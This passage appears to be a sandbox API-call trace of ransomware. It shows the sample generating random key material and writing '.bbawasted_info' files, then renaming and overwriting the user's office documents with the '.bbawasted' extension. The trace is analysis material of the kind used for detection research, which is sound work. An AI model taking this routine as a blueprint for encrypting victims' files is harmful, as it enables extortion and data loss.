HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\239DQPphtG6.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\239dqpphtg6.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\239DQPphtG6.ods.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\239dqpphtg6.ods.bbawasted")) returned 1 [0070.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\239DQPphtG6.ods.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\239dqpphtg6.ods.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.616] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.619] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.619] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.619] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.620] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.620] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.620] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.652] SetEndOfFile (hFile=0x120) returned 1 [0070.686] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.686] CloseHandle (hObject=0x120) returned 1 [0070.688] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0070.688] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0070.688] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.688] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.688] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\xXpR064tDTeH.odt") returned 86 [0070.688] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b6) returned 0x5c77b0 [0070.689] lstrcpyW (in: lpString1=0x5c785c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.689] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.689] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0070.689] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0070.689] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\xXpR064tDTeH.odt.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\xxpr064tdteh.odt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.690] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.691] SetEndOfFile (hFile=0x120) returned 1 [0070.691] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.691] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.691] lstrcpyW (in: lpString1=0x5c785c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\xXpR064tDTeH.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\xxpr064tdteh.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\xXpR064tDTeH.odt.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\xxpr064tdteh.odt.bbawasted")) returned 1 [0070.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\xXpR064tDTeH.odt.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\xxpr064tdteh.odt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.691] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.693] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.693] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0070.693] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.694] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.694] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.694] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.703] SetEndOfFile (hFile=0x120) returned 1 [0070.705] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.705] CloseHandle (hObject=0x120) returned 1 [0070.706] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0070.706] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0070.707] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.707] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.707] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\Q6lYRBb7f.rtf") returned 77 [0070.707] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a4) returned 0x5c77b0 [0070.707] lstrcpyW (in: lpString1=0x5c784a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.707] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.707] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0070.708] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0070.708] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\Q6lYRBb7f.rtf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\q6lyrbb7f.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.743] WriteFile (in: hFile=0xfc, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.744] SetEndOfFile (hFile=0xfc) returned 1 [0070.744] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.745] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.745] lstrcpyW (in: lpString1=0x5c784a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.745] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\Q6lYRBb7f.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\q6lyrbb7f.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\Q6lYRBb7f.rtf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\q6lyrbb7f.rtf.bbawasted")) returned 1 [0070.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\Q6lYRBb7f.rtf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\q6lyrbb7f.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.780] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0070.781] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.782] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0070.782] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.782] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.783] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.783] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.792] SetEndOfFile (hFile=0xfc) returned 1 [0070.794] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.794] CloseHandle (hObject=0xfc) returned 1 [0070.796] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0070.796] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0070.796] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.796] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.796] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\GFuz9TqLt.rtf") returned 63 [0070.797] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x288) returned 0x5c77b0 [0070.797] lstrcpyW (in: lpString1=0x5c782e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.797] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.797] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0070.797] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0070.797] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\GFuz9TqLt.rtf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\gfuz9tqlt.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.798] WriteFile (in: hFile=0xfc, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.799] SetEndOfFile (hFile=0xfc) returned 1 [0070.799] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.799] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.799] lstrcpyW (in: lpString1=0x5c782e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.799] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\GFuz9TqLt.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\gfuz9tqlt.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\GFuz9TqLt.rtf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\gfuz9tqlt.rtf.bbawasted")) returned 1 [0070.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\GFuz9TqLt.rtf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\gfuz9tqlt.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.800] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.802] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.803] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0070.803] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.803] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.804] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.804] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.823] SetEndOfFile (hFile=0xfc) returned 1 [0071.204] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.205] CloseHandle (hObject=0xfc) returned 1 [0071.206] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0071.206] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5c04a0) returned 1 [0071.207] CryptGenRandom (in: hProv=0x5c04a0, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0071.207] CryptReleaseContext (hProv=0x5c04a0, dwFlags=0x0) returned 1 [0071.207] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\rXMJekPhmvLHow2.ods") returned 69 [0071.207] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x294) returned 0x5c77b0 [0071.207] lstrcpyW (in: lpString1=0x5c783a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.207] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0071.207] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5c04a0) returned 1 [0071.208] CryptGenRandom (in: hProv=0x5c04a0, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0071.208] CryptReleaseContext (hProv=0x5c04a0, dwFlags=0x0) returned 1 [0071.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\rXMJekPhmvLHow2.ods.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\rxmjekphmvlhow2.ods.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.294] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0071.295] SetEndOfFile (hFile=0xf8) returned 1 [0071.296] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.296] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.296] lstrcpyW (in: lpString1=0x5c783a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\rXMJekPhmvLHow2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\rxmjekphmvlhow2.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\rXMJekPhmvLHow2.ods.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\rxmjekphmvlhow2.ods.bbawasted")) returned 1 [0071.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\rXMJekPhmvLHow2.ods.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\rxmjekphmvlhow2.ods.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.296] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0071.297] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0071.298] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0071.298] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.298] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0071.298] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0071.298] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.307] SetEndOfFile (hFile=0xf8) returned 1 [0071.309] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.309] CloseHandle (hObject=0xf8) returned 1 [0071.310] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0071.310] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0071.311] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0071.311] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\v12SI-RIZA.docx") returned 65 [0071.311] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28c) returned 0x5c77b0 [0071.311] lstrcpyW (in: lpString1=0x5c7832, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.311] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0071.311] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0071.312] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0071.312] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\v12SI-RIZA.docx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\v12si-riza.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.362] WriteFile (in: hFile=0xf8, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0071.363] SetEndOfFile (hFile=0xf8) returned 1 [0071.364] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.364] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.364] lstrcpyW (in: lpString1=0x5c7832, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\v12SI-RIZA.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\v12si-riza.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\v12SI-RIZA.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\v12si-riza.docx.bbawasted")) returned 1 [0071.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\v12SI-RIZA.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\v12si-riza.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.364] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0071.365] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0071.366] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.366] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.366] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0071.367] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0071.367] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.376] SetEndOfFile (hFile=0xf8) returned 1 [0071.378] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0071.378] CloseHandle (hObject=0xf8) returned 1 [0071.379] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0071.379] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0071.380] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0071.380] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\z9-C7bowL.pptx") returned 64 [0071.380] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28a) returned 0x5c77b0 [0071.380] lstrcpyW (in: lpString1=0x5c7830, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.380] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 